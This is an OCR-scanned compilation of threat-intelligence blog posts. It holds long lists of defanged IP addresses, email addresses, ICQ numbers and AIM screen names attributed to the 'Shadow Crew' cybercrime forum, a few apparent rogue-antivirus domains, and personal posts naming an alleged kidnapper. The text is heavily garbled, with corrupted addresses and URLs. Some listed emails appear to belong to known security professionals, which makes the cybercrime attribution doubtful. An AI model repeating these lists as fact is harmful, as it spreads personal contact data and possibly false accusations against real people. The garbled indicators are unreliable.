195[.]6[.]84[.]52 
195[.]97[.]138[.J212 
211[.J]111[.]161[.]145 
211[.]163[.]56[.]77 
211[.]163[.]94[.]81 
211[.]97[.]213[.]18 
212[.]118[.]2[.]194 
212[.]219[.]163[.]252 
212[.]38[.]132[.]194 
212[.]93[.]144[.]2 
213[.]121[.]248[.]147 
213[.J121[.]248[.]96 
213[.]176[.]21[.]25 
213[.]176[.]28[.]6 
213[.]227[.]69[.]247 
217[.]144[.]7[.]3 
217[.]218[.]15[.]133 
218[.]5[.J137[.]165 
4[.]42[.]141[.]33 
61[.]131[.]48[.]219 
124[.]125[.]252[.]64 
19226 


216[.]235[.]32[.]126 
193[.]15[.]176[.]34 
194[.]78[.]66[.]68 
195[.]116[.]218[.]236 
194[.]247[.187[.]4 
193[.]194[.]76[.]16 
213[.]229[.]53[.]1 
212[.]68[.]195[.]19 
146[.]164[.]34[.]19 
61[.]133[.]87[.]19 
211[.]141[.]48[.]2 
193[.]179[.]47[.]2 
194[.]79[.J112[.]5 
213[.]131[.]71[.]15 
194[.]126[.]122[.]1 
213[.]56[.]128[.]1 
62[.]162[.]87[.]6 
193[.]128[.]28[.]14 
62[.]188[.]56[.]1 
194[.]46[.]27[.]1 
195[.]224[.]154[.]23 
217[.]33[.]153[.]13 
217[.]34[.]145[.18 
217[.]35[.]93[.]18 
217[.]37[.]53[.]24 
217[.]37[.]58[.]13 
217[.]37[.]64[.]23 
213[.]163[.]52[.]3 
164[.]164[.]82[.]9 
192[.]116[.]43[.]18 
192[.]116[.]43[.]19 
212[.]29[.]215[.]17 
159[.]213[.]63[.]19 
212[.]75[.]196[.]1 
213[.]82[.]248[.]17 
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194[.]165[.]151[.]8 
211[.]55[.]81[.]5 
148[.]223[.]193[.]5 
148[.]233[.]16[.]21 
64[.]76[.J132[.]2 
213[.]76[.]235[.]3 
195[.]61[.]79[.]16 
195[.]131[.]97[.]23 
194[.]154[.]82[.]8 
212[.]32[.]196[.]9 
62[.]37[.]182[.]2 
195[.]77[.]33[.]15 
213[.]96[.]211[.]17 
213[.]136[.]46[.]12 
213[.]131[.]147[.]8 
61[.]13[.J161[.]25 
163[.]29[.]139[.]1 
193[.]95[.J27[.]25 
193[.]95[.]42[.14 
193[.]95[.]113[.]11 
212[.]15[.]28[.]6 
212[.]82[.]218[.]17 
217[.]164[.]56[.]8 
63[.]141[.]67[.]14 
63[.]222[.]218[.]14 
63[.]242[.]169[.]7 
64[.]24[.J17[.]23 
64[.]56[.]33[.]11 
64[.]122[.]36[.]7 
64[.]173[.]247[.]16 
65[.]64[.]1[.]18 
65[.]86[.]42[.]9 
66[.]87[.]139[.]13 
66[.]134[.]165[.]25 
144[.]223[.]34[.]15 
19228 


12[.]98[.]213[.]23 
12[.]153[.]68[.]13 
24[.]147[.]222[.]25 
63[.]125[.]75[.]16 
64[.]65[.]225[.]13 
64[.]77[.]61[.]1 
64[.]167[.]73[.]4 
64[.]172[.]88[.J15 
65[.]45[.]48[.]16 
66[.]62[.]131[.]3 
66[.]88[.]243[.]3 
67[.]89[.]129[.]16 
196[.]28[.]56[.]24 
199[.]178[.]39[.]1 
63[.]242[.]72[.]234 
195[.]199[.]78[.]221 
64[.]93[.]37[.]226 
212[.]19[.]67[.]159 
62[.]189[.]116[.]5 
217[.]56[.]14[.]162 
196[.]25[.]18[.]116 
211[.]5[.]148[.]67 
212[.]19[.]66[.]38 
194[.]182[.]84[.]2 
212[.]69[.]253[.]121 
213[.]4[.]21[.]163 
217[.J157[.]134[.]235 
63[.]227[.]49[.J113 
219[.]163[.]65[.]178 
64[.]252[.]125[.]124 
172[.]195[.]171[.]228 
172[.]195[.]255[.]255 
66[.]169[.]128[.]99 
66[.]11[.]162[.]142 
66[.]11[.]164[.]142 
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68[.]1[.J17[.]237 
68[.]6[.]19[.]237 
68[.]1[.]17[.]5 
66[.]11[.]175[.]255 
64[.]159[.]17[.]131 
64[.]156[.]82[.]16 
66[.]11[.]167[.]28 
211[.]8[.]73[.]197 
A[.]8[.]1[.12 
4[.]5[.]11[.]26 
64[.]82[.]91[.]165 
66[.]216[.]8[.]136 
61[.]156[.]35[.]53 
129[.]241[.]61[.]59 
61[.]159[.]224[.]3 
195[.]136[.]3[.]199 
211[.]162[.]38[.]27 
212[.]172[.]181[.]178 
211[.]86[.]65[.]74 
217[.]6[.J189[.]155 
213[.]82[.]87[.]98 
217[.]128[.]69[.]241 
217[.]59[.]86[.]69 
212[.]71[.]167[.178 
212[.]131[.]177[.]3 
61[.]95[.]33[.]6 
63[.]83[.]252[.]3 
195[.]181[.]4[.16 
12[.]39[.]133[.]114 
128[.]98[.]255[.]255 
62[.]67[.]59[.]34 
195[.]34[.]35[.]12 
123[.]123[.]123[.]43 
123[.]123[.]123[.]1 
123[.]123[.]123[.]2 
19230 


123[.]123[.]123[.]3 
195[.]145[.]1[.]144 
195[.]145[.]1[.]255 
195[.]75[.J113[.]255 
193[.]32[.]159[.]255 
194[.]41[.]95[.]255 
62[.]184[.]117[.]255 
195[.]183[.]49[.]128 
195[.]183[.]49[.]143 
194[.]69[.]69[.]167 
213[.]61[.]189[.]96 
213[.]61[.]189[.]127 
62[.]157[.]214[.]247 
62[.J225[.]11[.]144 
62[.J225[.]11[.J151 
63[.]236[.]56[.]224 
63[.]236[.]56[.]255 
196[.]28[.]49[.]31 
216[.]233[.]22[.]128 
216[.]233[.]22[.]135 
192[.]132[.]9[.]255 
216[.]233[.]56[.]184 
216[.]233[.]56[.]191 
216[.]233[.]123[.]111 
216[.]233[.]97[.164 
216[.]233[.]97[.]71 
216[.]233[.]56[.]176 
216[.]233[.]56[.]183 
159[.]17[.J255[.]255 
63[.]67[.]86[.]255 
63[.]71[.]124[.]192 
63[.]71[.]124[.J255 
63[.]72[.]243[.]255 
192[.]246[.]55[.]255 
63[.]74[.]88[.]64 
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63[.]74[.]88[.]79 
192[.]148[.]191[.]255 
163[.]39[.]255[.]255 
161[.]75[.J255[.J255 
192[.]48[.1247[.]255 
63[.]95[.]145[.]165 
1[.]195[.]193[.]192 
2[.]195[.]193[.]192 
3[.]195[.]193[.]192 
4[.]195[.]193[.]192 
119[.]195[.]193[.]192 
151[.]195[.]193[.]192 
192[.]195[.]193[.]192 
194[.]195[.]193[.]192 
232[.]195[.]193[.]192 
233[.]195[.]193[.]192 
234[.]195[.]193[.]192 
121[.]196[.]193[.]192 
122[.]196[.]193[.]192 
123[.]196[.]193[.]192 
231[.]196[.]193[.]192 
232[.]196[.]193[.]192 
233[.]196[.]193[.]192 
11[.]38[.]193[.]192 
12[.]38[.]193[.]192 
53[.]73[.]193[.]192 
195[.]75[.]113[.]39 
194[.]135[.]176[.]81 
195[.]75[.]113[.]49 
195[.]145[.]1[.]166 
192[.]193[.]195[.]132 
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18.1.35 Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communi- 
ties Personal Email Address Accounts - An OSINT Analysis (2022-01-28 16:17) 


[1] 


Dear blog readers, 


I’ve decided to share with everyone a currently active portfolio of IM screen names from the 
infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Tech- 
nical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber 


threat actor profiling campaigns. 


Sample Shadow Crew cybercrime-friendly forum community personal email address accounts: 
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idline@ziplip[.]Jcom 
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den5013@ziplip[.]Jcom 
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fakeid@ziplip[.]Jcom 
anonraider@hotmail[.]com 
KsnowyInc@ziplip[.]com 
spookycat911@ziplip[.]Jcom 
Necromancer01@2ziplip[.]Jcom 
script4dumps@ukr[.]net 
dominican@ziplip[.]Jcom 
rcwizard@ziplip[.]Jcom 
CAYMAN@Vegas[.]zzn[.]com 
kahuna@mailvault[.]com 
19266 


nhlaxus@ziplip[.]Jcom 
jamal@ziplip[.]Jcom 
cam@mailvault[.]com 
stocksstocks@ziplip[.]com 
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MiCRO tECh@ziplip[.]Jcom 
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kmx@egatobas[.]org 
hectorh@pobox[.]Jcom 
emmanuel@relaygroup[.]Jcom 
vanja@vanja[.Jcom 
dje@bht[.]Jcom 
dugsong@monkey[.]org 
lyndon@orthanc[.]ab[.]ca 
mts@off[. Joff[.]to 
paudley@blackcat[.]ca 
robert david graham@yahoo[.]com 
spambait-kyx@inetgrity[.]com 
chris@obscurity[.]lorg 
peter _wong@pmc-sierra[.]Jcom 
janet@lomas[.]ab[.]ca 
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dfreelove@yottayotta[.]Jcom 
dowen@intravelnet[.]com 
randlest@oanet[.]com 

jay @bastille-linux[. Jorg 
phil@ccc-ltd[.]com 
jed@pickel[.]net 
gshipley@neohapsis[.]com 
deraison@cvs[.]nessus[.]org 
maxx@securite[.]lorg 
mixter@newyorkoffice[.]com 
deraadt@cvs[.]openbsd[.]org 
dittrich@cac[.]washington[.]Jedu 
bgreenbaum@securityfocus[.]com 
neil@bortnak[.]Jcom 
annemarie@counterpane[.]Jcom 
chris[.]kuethe@ualberta[.]ca 
bob[.]beck@ualberta[.]ca 
tan@atstake[.]Jcom 
natasha@snort[.]org 
arr@watson[.]org 
aempirei@ucla[.Jedu 
ggolomb@enterasys[.]Jcom 
jfrank@b-ap[.]Jcom 
robert@infoserf[.]net 
kkuehl@cisco[.]com 
donnal[.]Jandert@sun[.]com 
bmc@snort[.]org 
jgary@clicktosecure[.]Jcom 
jpavlick@sourcefire[.]Jcom 
talisker@networkintrusion[.]co[.]Juk 
jwalchuc@enterasys[.]Jcom 
itay@imc[.]n| 
halvar@blackhat[.]Jcom 
ppY@ldealRealms[.]Jcom 
forrest@code-lab[.]Jcom 
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mconley@atstake[.]com 
jennifer@granick[.]Jcom 
scott@microsoft[.]com 
ah@securityfocus[.]Jcom 
cruci@hwa-security[.]net 
solar@openwall[.Jcom 
ivan[.]Jarce@corest[.]Jcom 
rlogan@camisade[.]com 
cmg@uab[.]Jedu 
jed@grep[.]net 
vOnelm0@best[.]Jcom 
snorthcutt@hawaiian[.]net 
frank@ccc[.]de 
dmckay@microsoft[.]Jcom 
jwilkins@bitland[.]net 
kf@gnosys[. ]biz 
unlearn@ne[.]mediaone[.]net 
jpr5@darkridge[.Jcom 
shok@dataforce[.]net 
thegnome@nmrrc[.]lorg 
ofir@sys-security[.]com 
provos@umich[.]Jedu 
silvio@big[.]net[.Jau 
mike@infonexus[.]com 
crispin@wirex[.]Jcom 
halfdead@phear|[.]org 
niness@devilness[.]org 
curtis[.]king@messagingdirect[.]Jcom 
rob@incident-response[.]org 
kam@aversion[.]net 
fuk@ghettobox[.]eurocompton[.]net 
merharm@wra[.]net 
zmagic@phear[.]org 
inter@logos[.]relcom[.]ru 
alive@blazinfyre[.]net 
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daemon@esmith[.]geezernet[.]nu 
nwonknu@ds!I-65-187-119-141[. ]telocity[.Jcom 
abramelon@cpn[.]cookchildrens[.]lorg 
thegnome@nrmc[.]org 
me@btinternet[.]Jcom 
Administrator@hotmail[.]Jcom 
redeemer@gOtr00t[.]net 
bO0iler@hotmail[.]com 
who@radiofreesatan[.]com 
poolemit@mailvault[.]Jcom 
fuckyoutxtax@hell[.Jcom 
proxydialup@yahoo[.]com 
info@megastep[.]com 
sales@diplomaone[.]com 
abuse@teledisnet[.]be 
NOC@sprint[.]net 
dvilpmntsftwr@hotmail[.]com 
stepgas@hotmaill[.]Jcom 
rra33@hotmail[.]Jcom 
cody@server[.]snni[.Jcom 
kwparris@csuh[. Jalunlink[.]Jcom 
wolfram@counterfeitcards[.]Jcom 
whoever@hotmail[.]Jcom 


Stay tuned! 


1. https://blogger . googleusercontent . com/img/a/AVvXsEi9hfR1-f76NtRqQ87y0UecITQT4acaHbDm84qBV51zB1Wwuf - 80YU14 


aS6Gb1_3ZVYs11UeDsnNZ_wmiyTS_ipXQc3XvQHKH9xi1LOfeO0TIw. 


18.1.36 Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communi- 
ties ICQ UINs - An OSINT Analysis (2022-01-28 16:18) 


[1] 
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Dear blog readers, 


I’ve decided to share with everyone a currently active portfolio of IM screen names from the 
infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Tech- 
nical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber 
threat actor profiling campaigns. 


Sample Shadow Crew cybercrime-friendly forum community ICQ UINs: 
999008 
9773639 
974763 
97254007 
95211861 
92754913 
914506 
89531566 
8923240 
86958674 
802820 
777726 
74623265 
7444304 
690033 
6666666 
637321 
62527577 
598629 
59838986 
56714884 
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56327073 
5556665 
517196 
48721062 
47564547 
4545 
44203686 
41781 
3727374 
362563 

35 

348140 
33342322 
332163 
330332251 
327539466 
320455282 
320100851 
319326887 
31485639 
304060 
29457002 
288687540 
288670074 
266472842 
26633491 
264975608 
2482045 
236790331 
230406 
222567486 
222409185 
22063094 
219747908 
21386767 
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213201784 
212719246 
19457815 
193200333 
1881621 
179251032 
178954300 
178832228 
178420526 
178210999 
178101166 
178020075 
177541908 
177507739 
177394922 
177016428 
176824746 
176531816 
175688952 
175596058 
175521773 
175350857 
175308348 
175157730 
174902318 
174760817 
174537112 
174511919 
174445299 
173846049 
173838529 
173767788 
17359522 
173387414 
173299970 
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173254582 
173019781 
173002204 
172674035 
172476811 
172290141 
172252866 
172021743 
171975533 
171805992 
1715300002 
171468368 
171440228 
170627352 
170324565 
170036758 
169769760 
169243371 
169220281 
169006693 
168834059 
168769080 
168675160 
168595955 
168495889 
168422846 
168413916 
167927175 
167897380 
167636937 
167023436 
166657595 
166581197 
166407706 
165969755 
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165638624 
165546617 
164872312 
164165878 
164008345 
162852265 
1601617 
158807983 
15652907 
154866004 
152616 
150860495 
139736678 
130915854 
11402050 
1111111 
10966997 
107021 
105233239 
103363810 
100631 
100161 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/a/AVvXsEgeD81J1vTUxUkj oEpYBwBupOHIV580CNBswipaQIR6hhVRO21w__kuo0 
68rxOnqTxMJvhwQu5Z7S-np81WecpLjDYPWIHhc7c71miuJxtHrlib 


18.1.37 Exposing A Portfolio of Shadow Crew Cybercrime-Friendly Forum Communi- 
ties IM Screen Names - An OSINT Analysis (2022-01-28 16:19) 


[1] 
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Dear blog readers, 


I’ve decided to share with everyone a currently active portfolio of IM screen names from the 
infamous Shadow Crew cybercrime-friendly forum community part of a currently ongoing Tech- 
nical Collection campaign for the purpose of assisting everyone in their cyber attack and cyber 
threat actor profiling campaigns. 


Sample Shadow Crew cybercrime-friendly forum community IM screen names: 
aim:goim?screenname=youngglobeman &message=Hello+Are+you+there? 
aim:goim?screenname=yeezz0r &message=Hello+Are+you+there? 
aim:goim?screenname=xkyroutx &message=Hello+Are+you+there? 
aim:goim?screenname=wisie459 &message=Hello+Are+you+there? 
aim:goim?screenname=whailen &message=Hello+Are+you+there? 
aim:goim?screenname=wgrumpke &message=Hello+Are+you+there? 
aim:goim?screenname=verbal0g &message=Hello+Are+you+there? 
aim:goim?screenname=unbreakable2009 &message=Hello+Are+you+there? 
aim:goim?screenname=TopHolos &message=Hello+Are+you+there? 
aim:goim?screenname=thenightmaresx &message=Hello+Are+you+there? 
aim:goim?screenname=thelistguysc &message=Hello+Are+you+there? 
aim:goim?screenname=theblinkstud182 &message=Hello+Are+you+there? 
aim:goim?screenname=Tandrek &message=Hello+Are+you+there? 
aim:goim?screenname=t909j &message=Hello+Are+you+there? 
aim:goim?screenname=tOastypimp &message=Hello+Are+you+there? 
aim:goim?screenname=SpacemanSpiff742 &mnessage=Hello+Are+you+there? 
aim:goim?screenname=sp+e+ar+legolas &message=Hello+Are+you+there? 
aim:goim?screenname=someguy/98 &message=Hello+Are+you+there? 
aim:goim?screenname=SomeCallMe+Byrd &message=Hello+Are+you+there? 
aim:goim?screenname=Sly+Immigrant &message=Hello+Are+you+there? 
aim:goim?screenname=sirnoface &message=Hello+Are+you+there? 

19292 


av-xp08.net 

av-xp2008.com 
av-xp2008.net 

avx08.net 

axp2008.com 
e-antiviruspro.com 
eantivirus-payment.com 
ekerberos.com 
online-security-systems.com 
xpprotector.com 


youpornzztube.com 


1932 


aim:goim?screenname=Sir+Aristrotle &message=Hello+Are+you+there? 
aim:goim?screenname=shaubarak &message=Hello+Are+you+there? 
aim:goim?screenname=shadylady18693 &message=Hello+Are+you+there? 
aim:goim?screenname=shady007 &message=Hello+Are+you+there? 
aim:goim?screenname=Screen+Serv &message=Hello+Are+you+there? 
aim:goim?screenname=ScottScurlock &message=Hello+Are+you+there? 
aim:goim?screenname=Sconoscuito &message=Hello+Are+you+there? 
aim:goim?screenname=SC+Talos &message=Hello+Are+you+there? 
aim:goim?screenname=savemejebus179 &message=Hello+Are+you+there? 
aim:goim?screenname=retarded+shit &message=Hello+Are+you+there? 
aim:goim?screenname=redundantcheese &message=Hello+Are+you+there? 
aim:goim?screenname=redbossaline &message=Hello+Are+you+there? 
aim:goim?screenname=rawistravis &message=Hello+Are+you+there? 
aim:goim?screenname=psndudel &message=Hello+Are+you+there? 
aim:goim?screenname=progressiveccna &message=Hello+Are+you+there? 
aim:goim?screenname=platinum54door &message=Hello+Are+you+there? 
aim:goim?screenname=phs2602 &message=Hello+Are+you+there? 
aim:goim?screenname=pg043 &message=Hello+Are+you+there? 
aim:goim?screenname=perfectids &message=Hello+Are+you+there? 
aim:goim?screenname=pbushe000 &message=Hello+Are+you+there? 
aim:goim?screenname=overviewband &message=Hello+Are+you+there? 
aim:goim?screenname=ourorgasms &message=Hello+Are+you+there? 
aim:goim?screenname=Original+Boski &message=Hello+Are+you+there? 
aim:goim?screenname=oofzpumba &message=Hello+Are+you+there? 
aim:goim?screenname=octane &message=Hello+Are+you+there? 
aim:goim?screenname=novidus &message=Hello+Are+you+there? 
aim:goim?screenname=NONE &message=Hello+Are+you+there? 
aim:goim?screenname=none &message=Hello+Are+you+there? 
aim:goim?screenname=Nobelc4t &message=Hello+Are+you+there? 
aim:goim?screenname=NiggaDjJackingDaHole &message=Hello+Are+you+there? 
aim:goim?screenname=na &message=Hello+Are+you+there? 
aim:goim?screenname=N/A &message=Hello+Are+you+there? 
aim:goim?screenname=mwdropout &message=Hello+Are+you+there? 
aim:goim?screenname=mustophamond &message=Hello+Are+you+there? 


aim:goim?screenname=mtnhardware121 &message=Hello+Are+you+there? 
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aim:goim?screenname=MrUntouchableSC &message=Hello+Are+you+there? 
aim:goim?screenname=mrmojorising97 &nessage=Hello+Are+you+there? 
aim:goim?screenname=MonetaryAffairs &message=Hello+Are+you+there? 
aim:goim?screenname=Mofia+MG &message=Hello+Are+you+there? 
aim:goim?screenname=mikeyb7895 &message=Hello+Are+you+there? 
aim:goim?screenname=miamimac305 &message=Hello+Are+you+there? 
aim:goim?screenname=meyercl101 &message=Hello+Are+you+there? 
aim:goim?screenname=MentalHpscotch &message=Hello+Are+you+there? 
aim:goim?screenname=menlochronic &message=Hello+Are+you+there? 
aim:goim?screenname=madcarder@aol[.]com &message=Hello+Are+you+there? 
aim:goim?screenname=mach844 &message=Hello+Are+you+there? 
aim:goim?screenname=LOSSisback &message=Hello+Are+you+there? 
aim:goim?screenname=linuxgeek99 &message=Hello+Are+you+there? 
aim:goim?screenname=LinuxDevil &message=Hello+Are+you+there? 
aim:goim?screenname=lazystatefan &message=Hello+Are+you+there? 
aim:goim?screenname=kickinhard2002 &message=Hello+Are+you+there? 
aim:goim?screenname=jwillvip &message=Hello+Are+you+there? 
aim:goim?screenname=johnvd18 &message=Hello+Are+you+there? 
aim:goim?screenname=JMOExtremeS10 &message=Hello+Are+you+there? 
aim:goim?screenname=jeffsm31337 &message=Hello+Are+you+there? 
aim:goim?screenname=jedisgod &message=Hello+Are+you+there? 
aim:goim?screenname=jeadien &message=Hello+Are+you+there? 
aim:goim?screenname=JCDyer82 &message=Hello+Are+you+there? 
aim:goim?screenname=jOke+y4+mind &message=Hello+Are+you+there? 
aim:goim?screenname=IrOnMaN800 &message=Hello+Are+you+there? 
aim:goim?screenname=IDLineNTT &message=Hello+Are+you+there? 
aim:goim?screenname=icerootl &message=Hello+Are+you+there? 
aim:goim?screenname=lamOms &message=Hello+Are+you+there? 
aim:goim?screenname=iamaballer847 &message=Hello+Are+you+there? 
aim:goim?screenname=HRSAFTER &message=Hello+Are+you+there? 
aim:goim?screenname=gosuns1965 &message=Hello+Are+you+there? 
aim:goim?screenname=globalflux &message=Hello+Are+you+there? 
aim:goim?screenname=Frozenct &message=Hello+Are+you+there? 
aim:goim?screenname=fonefag &message=Hello+Are+you+there? 


aim:goim?screenname=flameboysk8erl13 &message=Hello+Are+you+there? 
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aim:goim?screenname=firewirelD &message=Hello+Are+you+there? 
aim:goim?screenname=FenderESP &message=Hello+Are+you+there? 
aim:goim?screenname=Feces@Poop[.Jorg &message=Hello+Are+you+there? 
aim:goim?screenname=fdsf &message=Hello+Are+you+there? 
aim:goim?screenname=everybodyschild &message=Hello+Are+you+there? 
aim:goim?screenname=esolemio &message=Hello+Are+you+there? 
aim:goim?screenname=erols26 &message=Hello+Are+you+there? 
aim:goim?screenname=ElIMariachiMoco &message=Hello+Are+you+there? 
aim:goim?screenname=Edgarkrasav &message=Hello+Are+you+there? 
aim:goim?screenname=EddieG2277 &message=Hello+Are+you+there? 
aim:goim?screenname=ed0Own &message=Hello+Are+you+there? 
aim:goim?screenname=drunknsailorl &message=Hello+Are+you+there? 
aim:goim?screenname=dk3 &message=Hello+Are+you+there? 
aim:goim?screenname=djdonte69 &message=Hello+Are+you+there? 
aim:goim?screenname=Degauss007 &message=Hello+Are+you+there? 
aim:goim?screenname=dEeliriOous &message=Hello+Are+you+there? 
aim:goim?screenname=d0l3m1k3 &message=Hello+Are+you+there? 
aim:goim?screenname=cyptdog &message=Hello+Are+you+there? 
aim:goim?screenname=crommnz &message=Hello+Are+you+there? 
aim:goim?screenname=cpuaddict123 &message=Hello+Are+you+there? 
aim:goim?screenname=chemist+exposed &message=Hello+Are+you+there? 
aim:goim?screenname=CASLUSCLAY@AOL[.]JCOM &message=Hello+Are+you+there? 
aim:goim?screenname=cardseller420 &message=Hello+Are+you+there? 
aim:goim?screenname=Brydenn33 &message=Hello+Are+you+there? 
aim:goim?screenname=Boomsicka &message=Hello+Are+you+there? 
aim:goim?screenname=BoOtyMOnster &message=Hello+Are+you+there? 
aim:goim?screenname=Bluedevelz &message=Hello+Are+you+there? 
aim:goim?screenname=BLaZiNKeWP &message=Hello+Are+you+there? 
aim:goim?screenname=blackrob91@aol[.]Jcom &message=Hello+Are+you+there? 
aim:goim?screenname=BlaCkiCe8636 &message=Hello+Are+you+there? 
aim:goim?screenname=BlackBagTricks &message=Hello+Are+you+there? 
aim:goim?screenname=BigBoil881 &message=Hello+Are+you+there? 
aim:goim?screenname=benjaminbahr &message=Hello+Are+you+there? 
aim:goim?screenname=Belace123 &message=Hello+Are+you+there? 
aim:goim?screenname=badandy1318 &message=Hello+Are+you+there? 
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aim:goim?screenname=Ashlkam &message=Hello+Are+you+there? 
aim:goim?screenname=Asdf324tt &message=Hello+Are+you+there? 
aim:goim?screenname=ar-+naf &message=Hello+Are+you+there? 
aim:goim?screenname=ApUzllLa &message=Hello+Are+you+there? 
aim:goim?screenname=anonraider &message=Hello+Are+you+there? 
aim:goim?screenname=alkoholikboy &message=Hello+Are+you+there? 
aim:goim?screenname=airj3r &message=Hello+Are+you+there? 
aim:goim?screenname=aftermath1024 &message=Hello+Are+you+there? 
aim:goim?screenname=absentdreamerr &message=Hello+Are+you+there? 
aim:goim?screenname=45645645 &message=Hello+Are+you+there? 
aim:goim?screenname=111111 &message=Hello+Are+you+there? 

Stay tuned! 


1. https://blogger . googleusercontent .com/img/a/AVvXsEgfxJPOqq5drZV1WyyWS19dPSUF J3NDM-Hoqn6625j1VbRX6TatthVkG 
dS-zU5enwNun8sHizeU_5Y1£RQBGuixbpOOKBZsOWDp-RBmhIe92Ji 


18.2 February 


18.2.1 Exposing the "InFraud Organization" - An OSINT Analysis - Maltego Technical 
Details Video Demonstration (2022-02-01 13:54) 


[1] 


Amazing! 


Feel like it’s 2007 - check out the slides [2]here including the technical details [3]here which | 
produced for [4]https://whoisxmlapi.com here including the following Maltego technical details 
video demonstration video: 
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Enjoy! 


1. ftapa;/ blogger. googleusercontent.con/ing/a/AVo%sE jBGIT jRLKyPAVLrZ_onf6URMkehpcY_Mh]873aWaVi6SqHVZ=a12¥4XG 
2. heeps://apeakerdack. con /Adanchev/cesg-hp-cyberintel—dancha 

3, httpe://arive google. con/file/4/1SLpbbqd_1oDPPFHBUKC90%Y20Sa2vBtx/ vied 

4. 


https: //whoisxmlapi.com/ 


18.2.2 A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT Analysis 
(2022-02-02 18:24) 


[1] 


An image is worth a thousand words. Say no words! 


[2] 


[3] 
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[8] 


Related posts: 


[9]An Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law 
Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An Analysis 


[10]What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself 
To the Almighty Savior! - An Analysis 


[11]Dancho Danchev’s Disappearance - An Elaboration - Part Two 
[12]Dancho Danchev’s Disappearance 2010 - Official Complaint Against Republic of Bulgaria 


[13]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 
- Part Three 


[14]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 
- Part Two 


[15]Deep from the Trenches in Bulgaria - Part Three 
[16]Deep from the Trenches in Bulgaria - Part Two 
[17]How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria 


[18]A Profile of a Bulgarian Kidnapper - Pavlin Georgiev (NaBnuH Feoprues/Bacun Moes 
Tayescku/ABop Kones) - An Elaboration on Dancho Danchev’s Disappearance circa 2010 - 
An Analysis 


1. https: //blogger .googleusercontent .com/img/a/AVvXsEjo2msJ_ulwulhX7XbtqkSQTaLLifNmD-_jxOeoBv68rkKVoKOERiUVicX 


S8nDEUZAy 29gaAwmszPUYf is jm8emSN9ciextKUrnLrEq1pxPNy jwPD 
2. https://blogger .googleusercontent .com/img/a/AVvXsEhTcXzKqBEbMMeLdEhZf 0t 7fxuKZdxSwLLIfrGEmJ4hk60E2YKdZwJ2_I 
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"https: //blogger. googleusercontent. con/ing/a/ AVVKeEiSHSTTUNSIQWS4VPPCQGuvP_sPkAPCKGSDHVnaU_KPogGHAK6TLS9 
"https: //blogger .googleusercontent.con/ng// AVXsEixvGy2XGhin SGiixOSn1TalPgVeL.LrvQTWiGnedWi_SkVy8GcSBeAl 


WwW 


ms 


7Q-MsrODyApWQgSuXkjnsELeiA_sR3VvV60RtBGt JosTFSYNPqxClp 
ttps://blogger . googleusercontent.com/img/a/AVvXsEiYkpDNba0CQB JdHaUyldizxta0z6y4C11Lg1qEC4B7108Q15 JHIUpkXxP 


a 


| 


9. https: //ddanchev. blogspot. com/2022/01/an-update-on-my-disappearance-and.htm 


5. https: //blogger . googleusercontent . com/img/a/AVVXsEj3k4DVYem_-zqTAU8wdCrwTqr6J2_EyPbwtXvFMTz1FvJca8QZKomeQC 


o/s) ~N 


. https: //ddanchev. blogspot .com/2021/12/what- you-get-from-peasant-aria-land-new. htm 


11. https://ddanchev. blogspot .com/2019/04/dancho-danchevs-2010-disappearance.htm 
12. https://ddanchev. blogspot .com/2019/11/dancho-danchevs-disappearance-2010.htm 


13. https://ddanchev. blogspot . com/2021/03/dancho-danchevs-disappearance-2010.htm 
14. https://ddanchev. blogspot .com/2021/02/dancho-danchevs-disappearance-2010.htm 


15. https: //ddanchev. blogspot .com/2021/10/deep-from-trenches- in-bulgaria-part .htm 


. https: //ddanchev. blogspot . com/2021/09/deep-from-trenches- in-bulgaria-part-two.htm 
17. https: //ddanchev. blogspot .com/2020/12/how-i-got-robbed-and-beaten-and.htm 


. https://ddanchev. blogspot .com/2021/11/a-profile-of-bulgarian-kidnapper-pavlin. htm 


18.2.3 Exposing FBI’s Most Wanted Cybercriminal Mujtaba Raza from Forwarderz 
and SecondEye Solution - An OSINT Analysis - Maltego Technical Details Video 
Demonstration (2022-02-03 10:05) 


-oepanoud 


Get Photo ID, Proof Address, Invoices and other Documents Now 


Google is your best friend! 
Here’s the original [2]analysis. 


Check out the actual Maltego technical details video demonstration here: 


Enjoy! 


1. https: //blogger . googleusercontent. com/img/a/AVvXsEiRh7BB4iYOnRfZHxtnqMshPdxzzyY Idch8su0Di oBrwpWmmNdAQQGNdC4 


yyH4alZqdL9 JBxmREyeznQbau3eHPfxK5ZV JnZyNHbCtEcLuokqDm 


2. https: //ddanchev.blogspot .com/2022/01/profing-fbis-most-wanted-cybercriminal.htm 
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18.2.4 Who is Dancho Danchev? (2022-02-05 01:09) 


Folks, 


Do you remember who | am? Do you need to do a historical check on the security industry 
including me as an individual including my personal blog and all the socially-oriented work and 
contributors that I’ve made to the industry during the past ten years? If an image is worth a 
thousand words consider going through these images which | just found and took photos of 
and guess what - brace yourselves for the ultimate reality where I’ve officially soend over two 
decades actively working and researching the security industry. 


What’s my idea to publish these images? My personal goal and motivation is to make it clear 
and to ensure that my readers truly know what I’ve been up to in terms of challenges and all 
the hard work that I’ve done and achieved over the past twenty years in the security industry 
when | was basically a teenage hacker enthusiast that many folks and friends remember from 
back in the 90’s. 


Grab a copy of these images and keep them just in case they vanish somewhere or just in case 
and always remember to say "hi" or "keep up the good work" in a personal message or using 
email. It will be greatly appreciated. Don’t forget - "[1]The Best is Yet to Come". 


Sample personal photos of Dancho Danchev’s personal career experience in the 
world of hacking/information security/computer and network security/cybercrime re- 
search/security blogging/OSINT and threat intelligence analysis up to present day where 
you can check my company site here - [2]https://disruptive-individuals.com my CV 
here - [3]http://disruptive-individuals.com/wp-content/uploads/2021/11/Dancho _Danchev 
_CV _2021.pdf my Twitter account here - [4]https://twitter.com/dancho _danchev my 
